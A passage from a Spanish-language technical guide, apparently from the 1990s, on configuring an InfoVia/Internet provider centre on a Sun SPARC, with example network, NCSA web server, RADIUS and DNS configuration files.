Esto ha de ser asi puesto que en InfoVia el direccionamiento empleado es el
reservado a redes privadas. Por tanto, cualquier CPI que se instale de este
tipo debera respetar esta condicion. Los servicios que ofrecera a los usuarios
que accedan por cada una de ellas seran todos los que puede ofrecer Internet.
Entre estos servicios estan:

. Servidor de web.
. Servidor de mail.
. Servidor de news.


2.4 CPI PARA EL ACCESO A Internet DESDE InfoVia
-------------------------------------------

Este tipo de CPI esta conectado a las dos redes, a InfoVia y a Internet. La
peculiaridad de este tipo de centros es que permite a un usuario procedente de
InfoVia el acceso a Internet. Para ello, en una de las maquinas del centro se
ha de instalar un servidor RADIUS cuya mision es la de asignar direcciones de
Internet a los usuarios de InfoVia que se lo soliciten. Para que un CPI pueda
actuar como ``pasarela'' de InfoVia a Internet, ha de disponer de un rango
(``pool'') de direcciones validas de Internet. El usuario que vaya a acceder a
Internet desde InfoVia lo ha de hacer con una de las direcciones de ese rango,
es decir, con direcciones de Internet. Esto es asi dado que con las
direcciones empleadas por InfoVia no se puede acceder a Internet (son
direcciones reservadas para redes privadas). Cuando un usuario quiera acceder
a Internet a traves de este CPI, el cliente RADIUS instalado en el CSIV al que
ha accedido el usuario, se conectara al servidor RADIUS del CPI.
El cliente solicitara al servidor una de las direcciones IP que administra
este servidor RADIUS. Para ello el cliente ha de indicar al servidor el nombre
(``login'') y la clave (``password'') del usuario llamante. Si el nombre y la
clave son validos, y al CPI le quedan direcciones de Internet disponibles, el
servidor enviara al cliente RADIUS del CSIV la direccion IP con la que el
usuario puede acceder a Internet.

La comunicacion entre el cliente RADIUS del CSIV y el servidor RADIUS del CPI
se hace siempre por medio de direcciones de InfoVia. Este tipo de centros,
ademas puede dar servicios tanto a los usuarios que acceden desde InfoVia como
a los que acceden desde Internet. Es decir, este centro ademas de servir a los
usuarios llamantes como ``pasarela'' desde InfoVia a Internet, tambien puede
servir como un CPI del tipo descrito en el apartado anterior, el apartado 2.3.
En la Figura 2-4 se muestra un diagrama de un CPI con acceso a Internet desde
InfoVia.


3 ARQUITECTURA DE UN CPI
======================

En este capitulo se presenta una arquitectura unica para cualquier tipo de CPI.
Se trata de una solucion valida tanto para CPIs accesibles solo desde InfoVia
o Internet, asi como para un CPI accesible desde las dos redes o con pasarela
a Internet desde InfoVia. Las razones por las cuales se ha buscado una
arquitectura unica para cualquier tipo de CPI son dos:

1. Facilitar el montaje a todas las entidades que quieran instalar un CPI,
cualquiera que sea el tipo de CPI que vaya a instalar.

2. Dar una solucion con el menor numero posible de equipos, lo que implica una
reduccion en los costes de instalacion del CPI.

Para proponer una unica arquitectura en los CPIs, cualquiera que sea su tipo,
se ha tenido en cuenta lo siguiente:

. Por medio del protocolo frame relay un mismo enlace admite multiples
circuitos virtuales permanentes (PVC), cada uno de los cuales puede dar
soporte a una conexion distinta. De este modo un unico enlace frame relay con
dos PVCs, podria conectar a un CPI con Internet y con un Centro de Servicio
(CSIV) de InfoVia. El primer PVC soportaria la conexion con Internet.
Por medio del segundo PVC, el CPI se conectaria con el CSIV de InfoVia.

. Algunas maquinas UNIX admiten multiples direcciones (y tambien multiples
mascaras) en cada una de sus interfaces. Esto hace posible que una unica
maquina UNIX, con una unica interfaz, pueda comportarse como si se tratase de
dos maquinas diferentes, cada una con su direccion y mascara propia. Es decir,
se puede hacer que una misma maquina actue como si se tratase de dos maquinas,
cada una de las cuales forma parte de una red diferente. Esta caracteristica
que tienen algunas maquinas UNIX evita el tener que adquirir e instalar una
tarjeta con multiples interfaces para cada maquina que se quiere que sea
accesible desde redes distintas (InfoVia e Internet), ya que esto mismo se
puede conseguir via software.

. Un ``router'' admite en cada una de sus interfaces (tanto en las interfaces
ethernet como en las interfaces serie) multiples direcciones y mascaras. Esto
permite estructurar cada una de las interfaces de un ``router'' en
subinterfaces. Esta peculiaridad permite a partir de una unica interfaz serie,
disponer en realidad de multiples interfaces. Para ello basta configurar
multiples subinterfaces en esa unica interfaz.

. Los servidores de web NCSA o NetScape instalados en una maquina UNIX con
multiples direcciones IP, pueden proporcionar diferentes paginas HTML en
funcion de la direccion IP. Es decir, un servidor NCSA, o NetScape, instalado
en una maquina UNIX con varias direcciones IP, se puede configurar de forma
que se comporte como varios servidores de web diferentes, cada uno con sus
propios contenidos. Cada uno de estos ``servidores virtuales'' se corresponde
con una de las direcciones IP asignadas a la maquina.

. Un enlace frame relay. El numero de circuitos virtuales permanentes
necesarios sera:

* CPI accesible solo desde Internet: 1 PVC.
* CPI accesible solo desde InfoVia: 1 PVC por cada CSIV de InfoVia al
que se conecte el CPI.
* CPI accesible desde InfoVia e Internet: 1 PVC para Internet, y 1 PVC
por cada uno de los CSIV de InfoVia al que se conecte el CPI.
* CPI con acceso a Internet desde InfoVia: 1 PVC para Internet y 1 PVC
por cada uno de los CSIV de InfoVia al que se conecte el CPI.

. Un unico ``router'' con una interfaz ethernet y una interfaz serie. Por
medio de la interfaz ethernet, el ``router'' se conecta a la red de area local
(RAL) del CPI. El enlace frame relay se lleva a la interfaz serie.

* CPI accesible solo desde Internet: 1 PVC.
Interfaz ethernet: 1 direccion y mascara IP dentro del rango de
direcciones validas de Internet asignado por el IANA al proveedor.
Interfaz serie: 1 subinterfaz al que se ha de asignar el unico PVC
del enlace frame relay.
* CPI accesible solo desde InfoVia: 1 PVC como minimo.
Interfaz ethernet: 1 direccion y mascara IP dentro del rango de
direcciones utilizado en InfoVia. Interfaz serie: tantas
subinterfaces como el numero de CSIVs de InfoVia a los que esta
conectado el CPI. A cada subinterfaz se le asigna un PVC que conecta
con un determinado CSIV.
* CPI accesible desde InfoVia e Internet: 2 PVCs como minimo.
Interfaz ethernet: 2 direcciones y las correspondientes mascaras IP.
Una dentro del rango de direcciones empleado en InfoVia, y la otra
dentro del rango de direcciones validas de Internet asignado por el
IANA al proveedor.
Interfaz serie: 2 o mas subinterfaces. A una de las subinterfaces se
le asigna el PVC que conecta con Internet. A las restantes
subinterfaces se les asignan los restantes PVCs del enlace frame
relay, ya que son los PVCs que permiten la conexion del CPI con los
CSIVs de InfoVia.
* CPI con acceso a Internet desde InfoVia: 2 PVCs como minimo.

Interfaz ethernet: 2 direcciones y las correspondientes mascaras IP.
Una dentro del rango de direcciones empleado en InfoVia, y la otra
dentro del rango de direcciones validas de Internet asignado por el
IANA al proveedor.
Interfaz serie: 2 o mas subinterfaces. A una de las subinterfaces se
le asigna el PVC que conecta con Internet. A las restantes
subinterfaces se les asignan los restantes PVCs del enlace frame
relay, ya que son los PVCs que permiten la conexion del CPI con los
CSIVs de InfoVia.

. Una maquina UNIX, siempre que la capacidad (velocidad, disco duro, ...) sea
suficiente como para soportar todos los servicios de informacion que se
pretende que de el CPI. El numero de interfaces a configurar en la maquina es
el siguiente:

* CPI accesible solo desde Internet: 1 direccion y mascara IP, dentro
del rango de direcciones validas de Internet asignado por el IANA
al proveedor.
* CPI accesible solo desde InfoVia: 1 direccion y mascara IP, dentro
del rango de direcciones empleado en InfoVia.
* CPI accesible desde InfoVia e Internet: 2 direcciones y mascaras IP.
Una dentro del rango de direcciones empleado en InfoVia, y la otra
dentro del rango de direcciones validas de Internet asignado por el
IANA al proveedor.
* CPI con acceso a Internet desde InfoVia: 2 direcciones y mascaras
IP. Una dentro del rango de direcciones empleado en InfoVia, y la
otra dentro del rango de direcciones validas de Internet asignado
por el IANA al proveedor.


4 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE SUN SPARC
==================================================

La mejor manera de explicar como se ha de instalar un CPI es ilustrarlo con un
ejemplo. En este capitulo se presenta un ejemplo de un CPI. Las
caracteristicas de este CPI son las que se enumeran en la siguiente lista:

. Tipo del CPI: es un CPI con acceso a Internet desde InfoVia. El CPI esta
conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de Barcelona.

. Servicios ofrecidos por el CPI:

* Servidor de web para InfoVia.
* Servidor de web para Internet.
* Servicio de pasarela a Internet.

. Direcciones IP del CPI:

* Direcciones en InfoVia:

El centro tiene asignado un rango de 256 direcciones en InfoVia.
Este rango se emplea para dar direcciones de InfoVia a las maquinas
del centro.
Direcciones: Para las maquinas del centro: 10.128.102.0 a
10.128.102.255.

* Direcciones en Internet (asignadas por el IANA al proveedor):

El centro tiene asignada una clase C de direcciones en Internet:
Direcciones: 194.179.42.0 a 194.179.42.255

. El servidor de RADIUS del CSIV es el que se encarga de asignar direcciones
de InfoVia a los usuarios llamantes a cada uno de los CPIs conectados a ese
CSIV. Son por tanto los CSIV de Madrid y Barcelona los que controlaran los
``pools'' de direcciones de InfoVia.

. Para los usuarios que accedan a Internet desde InfoVia, el CPI tiene
definido un ``pool'' (rango) de direcciones que puede asignar dinamicamente a
los usuarios llamantes. Este ``pool'' a su vez se divide en dos rangos, uno
para los usuarios llamantes al CSIV de Madrid y otro para los usuarios
llamantes al CSIV de Barcelona. Este ``pool'' comprende las siguientes
direcciones:

* ``Pool'' de direcciones para los usuarios llamantes al CSIV de Madrid.
De 194.179.42.129 a 194.179.42.158, es decir un rango de 30 direcc.
* ``Pool'' de direcciones para los usuarios llamantes al CSIV de
Barcelona. De 194.179.42.161 a 194.179.42.190, es decir un rango de
30 direcciones.

Cuando cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un usuario
quiere acceder a Internet a traves de este CPI, el cliente de RADIUS del CSIV
correspondiente consultara al servidor RADIUS del CPI elegido por el usuario
llamante.

El equipamiento del CPI es el siguiente:

. Una maquina Sun SPARC-20, equipada con una unica interfaz ethernet. Sistema
operativo SunOS 5.3, con Open Windows 3.4 y Netra Internet Server 2.0.

. Un ``router'' CISCO 2500 equipado con una interfaz ethernet y dos interfaces
serie. Solo se van a emplear la interfaz ethernet y una de las interfaces
serie.

. Un enlace frame relay a 48 Kbit/s con tres PVCs, el 17 (para Internet), el
18 (para el CSIV de Madrid), y el 19 (para el CSIV de Barcelona). Cada PVC
garantiza una velocidad minima de 16 Kbit/s.

. Un ``hub'' con 8 tomas. Por tanto, la RAL del CPI se ha construido con el
``hub'' y cables de pares trenzados (UTP).

En los siguientes apartados se detalla la configuracion de cada una de las
maquinas que integran el CPI del ejemplo.


4.1 CONFIGURACION DE LA MAQUINA UNIX.
--------------------------------

En la maquina UNIX del CPI se han instalado los siguientes servidores:

. Un servidor de web NCSA. Se configura de modo que se comporte como dos
servidores de web independientes. Uno de ellos dara servicio a los usuarios
que accedan por Internet, mientras que el segundo da servicio a los que
accedan por InfoVia.

. Un servidor de RADIUS cuya mision es la de asignar dinamicamente las
direcciones del ``pool'' de direcciones de Internet manejado por el CPI.

. Un servidor DNS.

En los siguientes puntos se detalla la configuracion de la maquina asi como de
los diferentes servidores instalados en ella.


4.1.1 Configuracion de direcciones, interfaces y rutas.
------------------------------------------------

La maquina solo dispone de una interfaz, la le0, a la que se le asignan dos
direcciones IP. Estas direcciones son:

. Direccion IP de Internet: 194.179.42.2
. Direccion IP de InfoVia: 10.128.102.2

En el ejemplo se ha supuesto que el proveedor divide la clase C (256 dir.) que
se le ha concedido en subredes de 64 maquinas cada una. Por otra parte, en
InfoVia, para los usuarios llamantes y los CPIs se asignan direcciones de la
clase A 10.0.0.0 reservada por Internet para redes privadas. Esta clase A se
subdivide en dos redes, la que va de 10.0.0.0 a 10.127.255.255 para los
usuarios, mientras que las direcciones 10.128.0.0 a 10.255.255.255 para los
CPIs. De acuerdo con esto, las mascaras correspondientes seran:

. Mascara para la direccion IP de Internet: 255.255.255.192
. Mascara para la direccion IP de InfoVia: 255.128.0.0

En lo que a rutas se refiere, ha de habilitarse una ruta que permita encaminar
el trafico de los usuarios de InfoVia y el trafico con el CSIV. En esta ruta,
todo el trafico de las direcciones que van de la 10.0.0.0 a la 10.127.255.255,
ha de encaminarse a traves del ``router'' del CPI, el 10.128.102.1, y ademas,
permite que los paquetes salientes de la maquina tengan como direccion origen
la de InfoVia.

Los ficheros necesarios para configurar las direcciones son:

. /etc/hosts
. /etc/nodename
. /etc/hostname.le0
. /etc/hostname.le0:1
. /etc/netmasks
. /etc/defaultrouter
. /etc/rc2.d/S72inetsvc

El contenido de estos ficheros es el que se indica en los proximos
subapartados.


4.1.1.1 Fichero /etc/hosts
------------------

127.0.0.1 localhost loghost timehost
194.179.42.2 maquina
10.128.102.2 maquina-inf
194.179.42.1 router
10.128.102.1 router-inf


4.1.1.2 Fichero /etc/nodename
---------------------

maquina


4.1.1.3 Fichero /etc/hostname.le0
-------------------------

maquina


4.1.1.4 Fichero /etc/hostname.le0:1
---------------------------

maquina-iv


4.1.1.5 Fichero /etc/netmasks
---------------------

Por medio de este fichero se definen las mascaras a aplicar en cada una de las
interfaces (ya sean hardware o software) de la maquina.

194.179.42.0 255.255.255.192
10.0.0.0 255.128.0.0


4.1.1.6 Fichero /etc/defaultrouter
--------------------------

Este fichero indica cual es el ``router'' por defecto de la maquina. Es decir,
a que ``router'' se ha de enviar todo el trafico que llegue a la maquina y que
esta no sepa por donde encaminar segun las rutas definidas. El contenido del
fichero es:

router


4.1.1.7 Fichero /etc/rc2.d/S72inetsvc
-----------------------------

En este fichero se pueden configurar y activar o desactivar interfaces.
Tambien en este fichero se definen rutas. En este fichero ha de incluirse el
siguiente comando UNIX, con el objeto de asignar a la interfaz le0 de la
maquina una segunda direccion IP, la correspondiente a InfoVia.
/usr/sbin/ifconfig le0:1 10.128.102.2 netmask 255.128.0.0 up

Esta ultima instruccion no es necesaria si se ha creado el fichero
/etc/hostname.le0:1 en el que se le dice a la maquina la direccion de InfoVia,
y en el fichero /etc/netmasks se le ha asignado la mascara 255.128.0.0 a la
red 10.0.0.0. Para que el CPI pueda encaminar el trafico de los usuarios
llamantes a InfoVia y que los paquetes con destino a esos usuarios tengan como
direccion origen la de InfoVia, hay que definir en el fichero la siguiente
ruta:

/usr/sbin/route add net 10.0.0.0 10.128.102.1 1

Para que el CPI pueda encaminar la informacion con destino al cliente RADIUS
del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del CSIV al
que se conecta el CPI, debe incluirse en el fichero estas rutas:

/usr/sbin/route add host 172.16.192.1 10.128.102.1 1
/usr/sbin/route add host 172.16.193.1 10.128.102.1 1

Si en un futuro se a¤aden mas CSIVs, deberan a¤adirse mas rutas de ``hosts''
como las anteriores. Lo unico que cambiara es la direccion IP de lo ``hosts''
de los nuevos CSIVs.


4.1.2 Configuracion del servidor de web
---------------------------------

Para instalar un servidor de web NCSA, y que se comporte como dos servidores
independientes, han de configurarse los siguientes ficheros:

. /opt/SUNWweb/sun_httpd/conf/httpd.conf
. /opt/SUNWweb/sun_httpd/conf/access.conf
. /opt/SUNWweb/sun_httpd/conf/srm.conf

La ruta de acceso (``path'') de los tres ficheros anteriores no tiene por que
ser esa, ya que puede instalarse el servidor en otro sitio. Pero en el ejemplo
que aqui se presenta, se ha instalado el servidor en el directorio
opt/SUNWweb/sun_httpd. Los tres ficheros de configuracion del servidor
instalado estan en el directorio /opt/SUNWweb/sun_httpd/conf.


4.1.2.1 Fichero httpd.conf
------------------

# standalone configuration (not inetd spawned)
# This is the main server configuration file
ServerType standalone
Port 80
User nobody
Group nobody
ServerName maquina.subdominio.dominio.es
ServerAdmin postmaster@maquina.subdominio.dominio.es
ServerRoot /opt/SUNWweb/sun_httpd
ErrorLog logs/error_log
TransferLog logs/access_log
PidFile logs/htppd.pid
<VirtualHost maquina_inf>
ServerName maquina_inf
ServerAdmin postmaster@maquina_inf
DocumentRoot /opt/SUNWweb/htdocs/maquina_inf
ErrorLog logs/1-error_log
TransferLog logs/1-access_log
</VirtualHost>


4.1.2.2 Fichero access.conf
-------------------

# access.conf: Global access configuration
# Access permissions for your executable CGI programs
<Directory /opt/SUNWweb/cgi-bin>
Options Indexes FollowSymLinks
</Directory>

# Access permissions for your html files
<Directory /opt/SUNWweb/htdocs>
Options Indexes FollowSymLinks Includes
AllowOverride All
<Limit GET>
order allow, deny
allow from all
</Limit>
</Directory>
# Place any other directories you wish to access here


4.1.2.3 Fichero srm.conf
----------------

#
DocumentRoot /opt/SUNWweb/htdocs/maquina
Alias /icons /opt/SUNWweb/images
ScriptAlias /cgi-bin/ /opt/SUNWweb/cgi-bin/
#
UserDir public_html
DirectoryIndex index.html
FancyIndexing on
AddIconByType (TXT,/icons/text.xbm) text/*
AddIconByType (IMG,/icons/image.xbm) image/*
AddIconByType (SND,/icons/sound.xbm) audio/*
AddIcon /icons/movie.xbm .mpg .qt
AddIcon /icons/binary.xbm .bin
AddIcon /icons/back.xbm ..
AddIcon /icons/menu.xbm ^^DIRECTORY^^
AddIcon /icons/blank.xbm ^^BLANKICON^^
DefaultIcon /icons/unknown.xbm
ReadmeName README
HeaderName HEADER
IndexIgnore */
.??* *~ *# */HEADER* */README*
AccessFileName .htaccess
DefaultType text/plain
#
# Advanced topics - see tutorial
#
#AddEncoding x-compress Z
#AddEncoding x-gzip gz
# If you want to use server side includes, or CGI outside
# ScriptAliased directories, uncomment the following lines.
#AddType text/x-server-parsed-html .html
#AddType text/x-server-parsed-html .shtml
#AddType application/x-httpd-cgi .cgi


4.1.3 Configuracion del servidor de RADIUS
------------------------------------

El CPI elegido para el ejemplo permite el acceso a Internet a traves de
InfoVia. Por lo tanto debera instalarse en la maquina UNIX del CPI un servidor
de RADIUS que gestione el ``pool'' de direcciones de Internet y las vaya
asignando a los usuarios llamantes. En el ejemplo propuesto, este ``pool'' de
direcciones IP asignadas por el IANA al proveedor esta dividido a su vez en
dos ``pools'', uno para el CSIV de Madrid y otro para el CSIV de Barcelona. El
rango asignado al primer CSIV es el que va de la direccion 194.179.42.129 a la
194.179.42.158. El rango asignado al segundo CSIV va de la direccion
194.179.42.161 a la 194.179.42.190. Para obtener el fichero ejecutable del
servidor, los ficheros fuente del servidor RADIUS deberan compilarse para una
maquina UNIX de Sun con sistema operativo Solaris 2.4. En el ejemplo, el
servidor RADIUS del CPI se ha instalado en el directorio:

/export/home/prueba/radius_cpi_pr

Los ficheros del servidor, almacenados en el directorio anterior, son los
siguientes:

. radius
Para obtener el fichero ejecutable del servidor, los ficheros fuente del
servidor RADIUS deberan compilarse para una maquina UNIX de SUN. El fichero
ejecutable se ha situado en el directorio /export/home/prueba/radius_cpi_pr.

Arranque desde el directorio /export/home/prueba/radius_cpi_pr del comando:

nohup radius -d . &

Si se quieren obtener trazas del servidor RADIUS, deberan ejecutarse desde el
directorio /export/home/prueba/radius_cpi_pr los siguientes comandos:

touch Activar.radius1
touch Activar.radius2

Es el fichero ejecutable del servidor. El servidor estara activo si al
ejecutar el comando:

ps -ef | grep radius

Se obtiene como respuesta:

prueba 24024 23998 4 16:28:00 pts/1 0:00 grep radius
prueba 22623 1 71 Oct 16 pts/0 0:01 radius -d .

Las opciones con las que se ejecuta el comando radius son:

* -d <nombre_del_directorio_radius>

. cfg_local_INFOVIA
En este fichero se indica el nombre y el tipo del servicio ofrecido por el CPI.

. clientes_INFOVIA
Datos de los CSIV con los que se va a conectar el CPI. En este fichero

tambien se define el comienzo y tama¤o del ``pool'' de direcciones manejado
por el CPI.

. usuarios_INFOVIA
Datos de los usuarios autorizados por el CPI.

. README
Este fichero contiene una ayuda que puede resultar muy util a la hora de
instalar el servidor. Ademas, en el fichero /etc/services se ha de configurar
el puerto UDP usado por radius. Por defecto toma 1645. En el directorio en el
que se instala el servidor, se crea un subdirectorio en el que se almacenen
los ficheros con las trazas de todas las conexiones hechas al servidor por
parte del cliente RADIUS del CSIV al que se ha conectado el CPI.


4.1.3.1 Fichero cfg_local_INFOVIA
-------------------------

# FICHERO: cfg_local_INFOVIA
# =================
# Este fichero contiene los datos de configuracion de un servidor
RADIUS
#
# El primer campo indica el tipo de dato descrito:
# ALIAS ==> Nombre del servicio soportado en el servidor local. Se
pueden
# asignar cualquier numero de ALIAS al servicio. Por defecto
# el nombre del servicio es el nombre de la maquina.
# TIPO ==> Indica el tipo de servicio soportado en el servidor local.
Solo
# puede existir una linea de este tipo.
# 1 ==> Servicio autentificado+rango IP propio. En este caso
# los valores del rango IP se toman de la definicion
# de los clientes. No obstante los usuarios deberan
# definirse con la direccion 0xFFFFFFFF
# 2 ==> Servicio autentificado. En este caso no se hace caso
# del rango IP definido en el fichero de clientes. Los
# usuarios deberan definirse con la direccion 0xFFFFFFFE
# 3 ==> Servicio normal, en este caso se considera buena
# la direccion del usuario (pudiendo ser cualquiera
# incluido los valores 0xFFFFFFFF o 0xFFFFFFFE
# UDP ==> Indica el puerto UDP usado por por el proceso para escuchar
# peticiones. Si falta este campo se toma el puerto definido en
# /etc/services. Si en el /etc/services no esta definido
# se toma como puerto el valor 1645.
#IDENTIFICADOR VALOR
#------------- -----
ALIAS cpi_pr
TIPO 1
UDP 1645


4.1.3.2 Fichero clientes_INFOVIA
------------------------

# FICHERO: clientes_INFOVIA
# ================
#
# Este fichero contiene una lista de cliente (maquinas IP) que
# estan autorizadas a lanzar preguntas RADIUS sobre ESTE servidor
# y a recibir respuestas RADIUS desde ESTE servidor.
#
# 1.- El primer campo es el nombre del cliente
# 2.- El segundo campo es la palabra clave asociada a ese cliente.
# 3.- El tercer campo es la primera direccion IP del rango de
# direciones IP asignadas a los usuarios cuya autentificacion
# se realiza desde ese cliente.
# 4.- El cuarto campo es el tamano del rango de direcciones IP
asociado
# a ese cliente.
# 5.- Indica el tipo de cliente (sw==INFOVIA==0) o
# (hw==ASCEND==1)
# 6.- Indica el puerto UDP del cliente (solo usado si es sw para
# el sincronismo inicial)
# 7.- Indica el password del equipo hardware asociado como cliente
(solo
# usado si el cliente es hardware.
# 8.- Contiene la Identidad del equipo hw. Solo es significativo si
# el host es el CSIV.
#
# CAMPOS
# 1 2 3 4 5 6 7 8
172.16.192.1 ascend 194.179.42.129 30 0 1645 12345 1
172.16.193.1 ascend 194.179.42.161 30 0 1645 12345 1


4.1.3.3 Fichero usuarios_INFOVIA
------------------------

# FICHERO: usuarios_INFOVIA
# ================
#
# This file contains security and configuration information
# for each user. The first field is the user's name.
# This is followed (on the same line) with the list of authentication
# requirements for that user. This can include password, user name,
# and an expiration date of the user's password. When an
# authentication request is received from the Pipeline, these values
# are tested. A special user named "DEFAULT" can be created (and
# should be placed at the end of the user file) to specify what to do
# with users not contained in the user file. A special password of
# "UNIX" can be specified to notify the authentication server to use
# UNIX password (/etc/passwd) authentication for this user.
#
# Indented (with the tab character) lines following the first
# line indicate the configuration values to be passed back to
# the Pipeline to allow the initiation of a user session.
# This can include things like the PPP configuration values.
#
# A pseudo user to profide a login banner and list of hosts
# used when lan modem users dial in and the device is configured
# for menu mode.
# Este fichero contiene el formato definido por ASCEND para
# su interfaz por RADIUS.
# Ademas de los parametros definidos por ASCEND el sistema
# INFOVIA ha definido/modificado los siguientes valores:
# - SESIONES-INFOVIA = N
# Donde N es el numero de sesiones simultaneas que se quieren
# permitir
# para cada usuario definido en el fichero.
# - Framed-Address = Este parametro NO debe aparecer en el perfil
# de usuario o bien tendra el valor 255.255.255.255
# En caso contrario puede provocar errores en la direccion asignada
# al usuario.
# A continuacion se indican varios perfiles de usuario:
usu1 Password = "madrid"
a) SESIONES-INFOVIA = 1,
User-Service = Framed-User,
Framed-Protocol = PPP,
Framed-Address = 255.255.255.255,
Framed-Netmask = 255.255.255.255,
Ascend-Metric = 2,
Framed-Routing = None,
Framed-Compression = 0
Ascend-Idle-Limit = 0


4.1.4 Configuracion del servidor DNS
------------------------------

El servidor DNS se ha instalado en la misma maquina que el servidor RADIUS y
el servidor NCSA. Para configurar el servidor DNS, se ha de incluir en el
directorio /etc de la maquina UNIX el fichero named.boot. En este fichero se
define de que dominios es servidor de nombres la maquina. Tambien se indica en
que directorio se encuentran los ficheros que emplea el servidor DNS para la
traduccion de nombres a direcciones, y viceversa. Para comprobar que una vez
arrancada la maquina el servidor DNS esta activo, se puede emplear el comando:

ps -ef | grep in.named

Si el servidor esta activo, la respuesta al comando anterior sera similar a la
siguiente:

root 244 1 80 Dic 15 ? 50:19 /usr/sbin/in.named
root 20858 8639 6 08:25:56 pts/12 0:00 grep in.named

En los siguientes apartados, se adjuntan los listados de los ficheros
empleados por el servidor DNS.


4.1.4.1 Fichero /etc/named.boot
-----------------------

Es el primer fichero de configuracion de un servidor DNS. En este fichero se
encuentran los parametros basicos.

. En que directorio se encuentran los restantes ficheros que precisa el
servidor DNS.

. Los dominios de los que es servidor primario.

. Los dominios de los que es servidor secundario. En el ejemplo no lo es de
ninguno. En este fichero las lineas se comentan por medio de ``;''. El
contenido del fichero /etc/named.boot es el siguiente:

directory /var/named
cache . db.cache
primary cpi.telefonica.es db.cpi.telefonica.es
primary 42.179.194.IN-ADDR.ARPA db.194.179.42
primary 10.IN-ADDR.ARPA db.10
primary 0.0.127.IN-ADDR.ARPA db.127.0.0

La primera linea no comentada se¤ala el directorio en el que estan todos los
ficheros de datos que se referencian posteriormente. En la linea que empieza
por cache ..., se indica que en el fichero db.cache se encuentran los datos de
los servidores de los dominios raiz. Este fichero se obtiene a traves del
proveedor de Internet (IBERNET, red IRIS, ...). En las lineas que comienzan
por primary se indica de que dominios es servidor primario el servidor DNS.
Tambien se indican los ficheros con la informacion de esos dominios. Los
dominios 42.179.194.IN-ADDR.ARPA, 10.IN-ADDR.ARPA y 0.0.127.IN-ADDR.ARPA son
los que permiten dada una direccion de las clase 194.179.42.0 y 10.0.0.0, asi
como la direccion 127.0.0.1, obtener el nombre correspondiente. Si fuese
servidor secundario de algun dominio, se pondria en primer lugar secondary,
luego el nombre del dominio del que fuese servidor secundario, en tercer lugar
la direccion IP del servidor DNS primario de ese dominio, y por ultimo el
nombre del fichero en el que se va a almacenar la informacion de ese dominio
proporcionada por el servidor primario al secundario.


4.1.4.2 Fichero /var/named/db.cpi.telefonica.es
---------------------------------------

@ IN SOA maquina.cpi.telefonica.es.
postmaster.cpi.telefonica.es.
(
96013000 ; Serie
28800 ; Refresco 8 horas
7200 ; Reintento 2 horas
604800 ; Expira 7 dias
86400 ; Minimo TTL 1 dia
)
IN NS minerva.ibernet.es.
IN NS maquina.cpi.telefonica.es.
maquina.cpi.telefonica.es. IN A 194.179.42.2
router.cpi.telefonica.es. IN A 194.179.42.1
cpi.telefonica.es. IN MX 10 194.179.42.2

El significado de este fichero es el siguiente:

. @ indica que el dominio que cubre este fichero es cpi.telefonica.es.


. IN indica direcciones de Internet.

. SOA (``Start Of Authority''): Tipo de recurso.

. maquina.cpi.telefonica.es es el nombre de la maquina en la que esta este
fichero.

. postmaster.cpi.telefonica.es es la direccion de correo del responsable del
servidor.

. El numero de serie es un entero de 32 bits que indica la version del fichero.
Puede construirse como en el ejemplo o de cualquier otra forma. Cada vez que
se modifica el fichero, debe incrementarse el numero de serie.

. Refresco indica cada cuanto tiempo (en segundos) un servidor de nombres
secundario de un dominio debe consultar al servidor primario del mismo dominio
para ver si es necesaria una actualizacion.

. Reintento indica cada cuanto tiempo (en segundos) intentara un servidor de
nombres secundario realizar una consulta en caso de fallo.

. Expiracion es el limite superior de tiempo (en segundos) que un servidor
secundario usara los datos que no hayan sido refrescados.

. Tiempo de vida es el numero de segundos, por defecto, que se usara en el
campo de tiempo de vida de los registros de recursos que no tengan indicado
explicitamente otro valor.

. A continuacion, en el fichero vienen los registros de servidores de nombres
(NS) donde minerva.ibernet.es es un servidor de nombres secundario y donde
maquina .cpi.telefonica.es es el servidor de nombres primario.

. Los siguientes registros son de direcciones (A) y es a partir de donde el
servidor de nombres obtiene las direcciones. Si en la red hubiese mas maquinas
que las del ejemplo, se incluiria su nombre y direccion en estos registros.

. El ultimo registro es el del Mail Exchanger (MX) y especifica la maquina que
sabe distribuir el correo en el dominio indicado (o a ciertas maquinas del
dominio). Puede haber mas de un registro de este tipo.


4.1.4.3 Fichero /var/named/db.194.179.42
--------------------------------

@ IN SOA maquina.cpi.telefonica.es.
postmaster.cpi.telefonica.es.
(
96013000 ; Serie
28800 ; Refresco 8 horas
7200 ; Reintento 2 horas
604800 ; Expira 7 dias
86400 ; Minimo TTL 1 dia
)
IN NS minerva.ibernet.es.
IN NS maquina.cpi.telefonica.es.
2.42.179.194.IN-ADDR.ARPA. IN PTR maquina.cpi.telefonica.es.
1.42.179.194.IN-ADDR.ARPA. IN PTR router.cpi.telefonica.es.

En este fichero, los registros SOA y NS tienen el mismo significado que en el
fichero anterior (vease el apartado 4.1.4.2) db.cpi.telefonica.es. Los
registros de tipo PTR proporcionan informacion para obtener el nombre de una
maquina a partir de la direccion IP, o a partir de un alias, obtener el nombre
real de la maquina. El formato de estos registros es el siguiente:

direccion _IP_al_reves.IN-ADDR.ARPA IN PTR nombre_maquina
o
alias _de_la_maquina.IN-ADDR.ARPA IN PTR nombre_maquina

De la primera clase de registros de este tipo debe haber tantos registros como
registros del tipo A haya en el fichero del apartado 4.1.4.2 (en el ejemplo el
fichero db.cpi.telefonica.es).


4.1.4.4 Fichero /var/named/db.10
------------------------

@ IN SOA maquina.cpi.telefonica.es.
postmaster.cpi.telefonica.es.
(
96013000 ; Serie
28800 ; Refresco 8 horas
7200 ; Reintento 2 horas
604800 ; Expira 7 dias
86400 ; Minimo TTL 1 dia
)
IN NS maquina.cpi.telefonica.es.
2.102.128.10.IN-ADDR.ARPA. IN PTR maquina-inf.telefonica.inf.

Los registros de este fichero tienen el mismo significado que los del fichero
anterior (apartado 4.1.4.3). Este fichero se ha incluido para que el servidor
pueda resolver direcciones de InfoVia. La inclusion de este fichero evita que
el servidor DNS propague preguntas sobre direcciones de InfoVia (de la clase A
10.0.0.0) a otros servidores DNS de Internet. Esto contribuye a separar
claramente lo que es InfoVia de lo que es Internet.


4.1.4.5 Fichero /var/named/db.127.0.0
-----------------------------

@ IN SOA maquina.cpi.telefonica.es.
postmaster.cpi.telefonica.es.
(
96013000 ; Serie
28800 ; Refresco 8 horas
7200 ; Reintento 2 horas
604800 ; Expira 7 dias
